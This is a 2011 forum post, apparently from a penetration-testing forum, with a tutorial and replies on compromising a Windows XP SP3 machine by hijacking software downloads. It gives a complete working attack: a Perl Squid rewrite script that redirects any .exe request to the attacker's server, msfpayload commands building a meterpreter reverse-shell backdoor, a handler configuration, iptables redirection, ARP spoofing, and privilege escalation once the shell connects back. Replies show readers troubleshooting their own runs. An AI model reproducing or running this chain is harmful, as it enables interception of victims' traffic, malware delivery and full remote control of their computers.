[Video] Owning Windows (XP SP3 vs. Squid)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4862927/
Download video: http://www.mediafire.com/?l7gezd8ai263a72
Download Script (replace.pl): http://www.mediafire.com/?nheqdn6h4i6w17k


Brief Overview
This screencast demonstrates hijacking applications when they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either via the target or another program (For example, self-updating programs).

The attacker takes control of the traffic by doing a “Man In The Middle” (MITM) attack, to analyse the traffic, in-which if the requested file ends in ".exe", it is redirected to the attackers web server that will always reply with the same filename with the agent creating the illusion that it was the requested file.

Please note: Unlike the other two videos previously, where the attacker was targeting programs/services that comes with the Operating System, the attacker pursuits 3rd party applications - or the process of trying to install them. The result of this is, there is more user interaction needed than before, whereas before it was either very little (visit any web page) or nothing. Therefore the attacker needs the target to perform a certain action(s) (either willing or unaware).
The chosen method of attack can be performed by a simpler method, however this method was chosen for reasons of future posts.


Scenario/Setup
This is the third video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 3, in the aid of seeking better security, after becoming compromised... twice.

After spending hours re-formatting, installing and restarting the target is using a fully up-to-date system running Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much" as every setting is still at their default options and haven't install any programs such as Anti-Virus, Firewalls or any browser-based application (E.g. Flash or Java).

This time around, the attacker approaches the attack by attacking the process of installing new or updating existing software.


What was needed?

• Nmap – (Can be found in BackTrack 4-R2)
• PostgreSQL – (Can be found in BackTrack 4-R2)
• Metasploit – (Can be found in BackTrack 4-R2)
• Apache – (Can be found in BackTrack 4-R2)
• A Text Editor – (Kate can be found in BackTrack 4-R2)
• Squid – (Can be found in the BackTrack repository )
• arpspoof – (Part of the DSniff suite which can be found in the BackTrack 4-R2)

replace.pl

Code:

#!/usr/bin/perl
########################################################################
# replace.pl         --- Squid Script (Application replacement)        #
# g0tmi1k 2011-03-09                                                   #
########################################################################
use IO::Handle;
use File::Basename;

$|=1;
$ourIP = "192.168.0.33";
$debug = 0;

if ($debug == 1) { open (DEBUG, '>>/tmp/replace_debug.log'); }
autoflush DEBUG 1;

while (<>) {
   chomp $_;
   if ($_ =~ /(.*\.exe)/i) {
      if ($debug == 1) { print DEBUG "Input: $url\n"; }
      $url = $1;
      $filename = basename( $url );
      $new_url = "http://$ourIP/$filename";
      print "$new_url\n";
      if ($debug == 1) { print DEBUG "Filename: $filename\nOutput: $new_url\n"; }
   }
   else {
      print "$_\n";
   }
}

Method

• Start network services and obtain an IP address
• Create resource file and agent for metasploit
• Start and configure metasploit to listen for the backdoor
• Configure and start apache web server
• Download, install and configure Squid proxy
• Perform a man in the middle attack
• Wait for target to download a program (either willing or unknown)
• Game Over

Commands:

Code:

start-network
dhclient eth0
/etc/init.d/postgresql-8.3 start
clear

map 192.168.0.* -n -sn -sP
nmap 192.168.0.103 -T4 -O -v
clear

echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
msfpayload windows/meterpreter/reerse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe 
export GOCOW=1     # Always cow logo ;)
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set ExitOnSession false
set AutoRunScript /root/replace.rb
show options
exploit -j

#kate -> New
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) evil.exe
# Save: /var/www/.htaccess
#kate -> Open: /etc/apache2/sites-enabled/000-default
#Edit (Line 11): AllowOverride All
#Save
start-apache   # /etc/init.d/apache2 start

apt-cache search squid
apt-get install squid3
y
update-rc.d -f squid3 remove

kate -> Open: /etc/squid3/squid.conf
Edit (Line 588): acl localnet src 192.168.0.0/16
Edit (Line 644): http_access allow localnet
Edit (Line 868): http_port 3128 transparent
Add (Line: *end*): url_rewrite_program /root/replace.pl
Save
kate -> Open: /root/replace.pl
chmod 755 /root/replace.pl
/etc/init.d/squid3 restart

iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward
#cat /proc/sys/net/ipv4/ip_forward
#Start -> run -> cmd -> arp -a
arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
#Start -> run -> cmd -> arp -a

IE -> http://www.filehippo.com -> Search: flash. Download & Run

sessions -l -v
#Kill arpspoof

IE -> http://www,filehippo.com -> Search: notepad++. Download Older & Run

arpspoof -i eth0 -t 192.168.0.103 192.168.0.1

Notepad++ -> ? -> Check for updates

#Kill arpspoof
sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

[g0tmi1k]

Walk-through
The attacker once again starts off by doing a quick sweep of the network with nmap and after identifying the target proceeds to do a port scan on the target. However this time around, no ports respond (due to the firewall being enabled by default now), which limits the returned information.

The attacker then moves onto creating a resource file for metasploit which, by using railgun calls a simple Windows API command to display a message box which is used to give feedback to the target that the program has been executed and not left wondering what’s happening.
The attacker continues the metasploit usage by creating the agent and configuring metasploit to listen for a connection back to it. Once a connection has been created the attacker sets the resource script to be automatically executed.

The attacker proceeds by setting up an Apache web server which is used to deliver the agent to the user. The attacker enables and creates a "distributed configuration file" (.htaccess), that links any requested URL to the metasploit agent and returns with the same name as requested.

As the attacker now has a backdoor and a delivery system ready the attacker needs a method of filtering the web traffic to create a rule to replace any requested URL which ends in EXE (which is a very common application extension used in a windows environment) to be redirected to the attackers web server instead. The attacker installs Squid3 cache proxy that can do such a thing by using a perl script (replace.pl).
Ettercap could of also been used for an alternative solution, however due to limited scripting functionality the results weren't as high.

As everything is now ready, the attacker just needs to redirect the traffic via their machine. Like before, the attack performs an ARP man in the middle attack with the aid of arpspoof.

Everything is in place and ready for the target to request a program. This can be done by either requesting it themselves (visiting a site and downloading it "manually") or by a program that is already installed (it has to check for an update, found that there is an update available and automatically downloads & executes the program.)

After waiting, the attacker notices that a session has been created and is able to stop the man in the middle attack as the attacker doesn't need to have the targets traffic as they have a direct connection to the target themselves.

A simple bit of privilege escalation gives the attacker complete access to the targets machine.



Notes:

• The recording software did glitch in a few places - which I re-recorded a section and edited it in.
• The first time when the target tries to download an application, they click on the notification bar at the top, rather than re-clicking on the click.
• Adobe flash official web site, detects the browser agent and uses a different delivery system to install, which wouldn't have worked in default browser (Internet Explorer).
• Not every auto-update features use ".exe" files to update.
• It is recommended to check the checksum (E.g. MD5 or SHA1) of download programs before executing.
• It is recommended to only download from the official sites, sources or mirrors. Flash was downloaded from adobe.com (filehippo redirects to it), whereas notepad++ was hosted on filehippo.com

Song: Free Your Soul - Command Strange & Strings Track (Apex Remix) - Bachelors of Science
Video length: 10:00
Capture length: 34:11

Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs-squid.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38565-%5Bvideo%5D-owning-windows-xp-sp3-vs-squid.html#post191335

[Scamentology]

I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

Thanks

[Anaxag0re]

Thanks for this new tutorial
You're doing a good job, thanks

I tried to follow it but I've one error when I download Flash from fileHippo : "ERROR The requested URL could not be retrieved.
While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
The following error was encountered:
Connection to [Attacker IP] Failed
The system returned: (113) No route to host."

It seems i've failed squid configuration, or the script setting.
I'll try to restart from the beginning, but if you have the solution...

One more time, thanks for these tutorials

[g0tmi1k]

I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

Thanks

Hehe! Best of luck with it! Hope you have more success with it now

Thanks for this new tutorial
You're doing a good job, thanks

I tried to follow it but I've one error when I download Flash from fileHippo : "ERROR The requested URL could not be retrieved.
While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
The following error was encountered:
Connection to [Attacker IP] Failed
The system returned: (113) No route to host."

It seems i've failed squid configuration, or the script setting.
I'll try to restart from the beginning, but if you have the solution...

One more time, thanks for these tutorials

Thanks for the thanks!
What happens when you try and do it locally on the attackers machine?
That error is linked to squid.... Is the target on the same subnet? You may need to change

"Edit (Line 588): acl localnet src 192.168.0.0/16"

To fit your IPs